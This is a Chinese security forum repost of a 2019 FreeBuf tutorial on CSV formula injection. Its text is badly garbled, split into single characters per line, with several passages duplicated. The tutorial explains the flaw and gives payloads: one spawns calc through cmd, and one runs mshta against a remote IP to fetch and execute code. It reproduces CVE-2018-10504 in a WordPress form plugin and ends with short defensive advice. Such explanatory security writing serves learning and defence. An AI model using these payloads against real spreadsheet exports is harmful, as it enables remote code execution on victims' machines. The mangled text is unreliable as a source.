论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[13766] 2019-02-17_浅谈CSV注入漏洞
文档创建者:
s7ckTeam
浏览次数:
11
最后更新:
2025-01-18
漏洞
11 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2019-02-17_浅谈CSV注入漏洞
浅
谈
C
S
V
注
入
漏
洞
原
创
3
u
n
s
h
i
n
e
F
r
e
e
B
u
f
2
0
1
9
-
0
2
-
1
7
背
景
背
景
某
天
在
逛
某
天
在
逛
e
x
p
d
b
时
候
看
到
了
时
候
看
到
了
C
S
V
I
n
j
e
c
t
i
o
n
的
的
e
x
p
,
在
渗
透
测
试
的
过
程
中
也
偶
尔
会
遇
到
类
似
的
情
况
,
这
一
漏
洞
很
早
,
在
渗
透
测
试
的
过
程
中
也
偶
尔
会
遇
到
类
似
的
情
况
,
这
一
漏
洞
很
早
之
前
就
出
现
过
,
但
是
很
多
人
没
有
意
识
到
漏
洞
的
危
害
性
,
于
是
抱
着
学
习
的
心
态
进
行
了
一
波
漏
洞
复
现
和
学
习
。
之
前
就
出
现
过
,
但
是
很
多
人
没
有
意
识
到
漏
洞
的
危
害
性
,
于
是
抱
着
学
习
的
心
态
进
行
了
一
波
漏
洞
复
现
和
学
习
。
漏
洞
介
绍
漏
洞
介
绍
C
S
V
公
式
注
入
公
式
注
入
(
C
S
V
I
n
j
e
c
t
i
o
n
)
)
是
一
种
会
造
成
巨
大
影
响
的
攻
击
向
量
。
攻
击
包
含
向
恶
意
的
E
X
C
E
L
公
式
中
注
入
可
以
输
出
或
以
C
S
V
文
件
读
取
的
参
数
。
当
在
E
x
c
e
l
中
打
开
C
S
V
文
件
时
,
文
件
会
从
C
S
V
描
述
转
变
为
原
始
的
E
x
c
e
l
格
式
,
包
括
E
x
c
e
l
提
供
的
所
有
动
态
功
能
。
在
这
个
过
程
中
,
C
S
V
中
的
所
有
E
x
c
e
l
公
式
都
会
执
行
。
当
该
函
数
有
合
法
意
图
时
,
很
易
被
滥
用
并
允
许
恶
意
代
码
执
行
。
漏
洞
原
理
漏
洞
原
理
人
们
通
常
认
为
C
S
V
或
x
l
s
文
件
中
包
含
的
文
本
不
会
有
任
何
安
全
风
险
,
这
是
比
较
大
的
一
个
误
区
。
首
先
我
们
创
建
一
个
E
x
c
e
l
文
件
,
将
其
中
一
格
内
容
修
改
为
=
3
6
+
1
保
存
之
后
看
到
如
下
结
果
,
公
式
正
常
计
算
:
虽
然
单
元
格
的
内
容
在
引
号
内
,
但
由
于
第
一
个
字
符
是
=
,
它
以
一
个
表
达
式
的
形
式
被
处
理
,
实
际
上
包
括
=
-
+
@
这
样
的
符
号
都
会
触
发
这
种
行
为
,
正
常
来
说
,
如
果
数
据
量
比
较
大
的
情
况
下
,
管
理
员
一
般
不
会
花
那
么
多
时
间
去
一
个
个
检
查
输
入
内
容
是
否
正
常
。
(
e
m
m
m
正
常
人
可
能
都
不
会
这
么
干
)
由
于
表
达
式
就
是
可
以
执
行
的
代
码
,
所
以
假
如
我
们
把
输
入
内
容
修
改
为
:
之
后
点
击
保
存
,
然
后
再
次
打
开
,
会
看
到
如
下
提
示
:
点
击
是
是
之
后
,
弹
出
计
算
器
:
漏
洞
危
害
漏
洞
危
害
这
类
漏
洞
通
常
不
会
针
对
于
专
业
的
网
络
安
全
人
员
,
毕
竟
是
个
搞
安
全
的
都
知
道
c
m
d
不
要
随
便
启
用
,
但
是
对
于
大
部
分
人
来
说
,
尤
其
是
正
常
的
企
业
员
工
,
往
往
会
忽
视
问
题
的
严
重
性
,
可
能
随
手
就
点
了
个
是
是
,
因
此
这
类
漏
洞
一
种
利
用
方
式
可
以
用
于
钓
鱼
,
另
一
种
也
和
钓
鱼
类
似
,
需
要
网
站
后
台
存
在
导
出
e
x
c
e
l
功
能
,
攻
击
者
通
过
污
染
数
据
,
当
管
理
员
或
者
其
他
用
户
需
要
用
到
导
出
e
x
c
e
l
功
能
时
,
被
污
染
的
数
据
被
一
起
导
出
,
当
打
开
该
文
件
时
并
且
忽
略
告
警
提
示
点
了
是
是
,
一
起
完
美
的
攻
击
就
完
成
了
。
漏
洞
复
现
漏
洞
复
现
=
1
+
c
m
d
|
'
/
C
c
a
l
c
'
!
A
0
漏
洞
复
现
采
用
了
C
V
E
-
2
0
1
8
-
1
0
5
0
4
,
也
就
是
w
o
r
d
p
r
e
s
s
的
F
o
r
m
M
a
k
e
r
插
件
的
c
s
v
注
入
漏
洞
。
P
o
C
可
参
考
:
首
先
下
载
安
装
该
插
件
:
安
装
后
在
功
能
栏
就
能
看
到
:
我
们
这
边
用
有
两
个
用
户
a
d
m
i
n
和
s
u
n
s
h
i
n
e
:
:
登
录
s
u
n
s
h
i
n
e
用
户
,
使
用
F
o
r
m
M
a
k
e
r
提
交
如
下
信
息
:
h
t
t
p
s
:
/
/
w
w
w
.
e
x
p
l
o
i
t
-
d
b
.
c
o
m
/
e
x
p
l
o
i
t
s
/
4
4
5
5
9
+
1
+
c
m
d
|
'
/
c
m
s
h
t
a
.
e
x
e
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
3
3
.
1
0
2
:
8
0
8
0
/
a
'
!
A
0
后
台
可
以
看
到
数
据
已
经
被
污
染
了
:
a
d
m
i
n
用
户
登
录
,
打
开
F
o
r
m
M
a
k
e
r
–
S
u
b
m
i
s
s
i
o
n
s
–
C
o
n
t
a
c
t
U
S
–
E
x
p
o
r
t
t
o
C
S
V
打
开
会
有
这
样
的
安
全
提
示
:
默
认
启
用
启
用
和
点
击
是
是
之
后
就
能
看
到
机
器
上
线
了
:
漏
洞
防
护
漏
洞
防
护
对
于
网
站
来
说
,
比
较
合
理
的
防
御
方
式
是
对
输
入
输
出
特
殊
字
符
进
行
编
码
;
对
于
平
时
常
规
文
件
的
传
递
中
,
只
能
尽
量
为
员
工
做
好
相
关
的
安
全
意
识
培
训
来
做
相
关
的
防
范
。
*
本
文
原
创
作
者
:
本
文
原
创
作
者
:
3
u
n
s
h
i
n
e
,
本
文
属
,
本
文
属
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞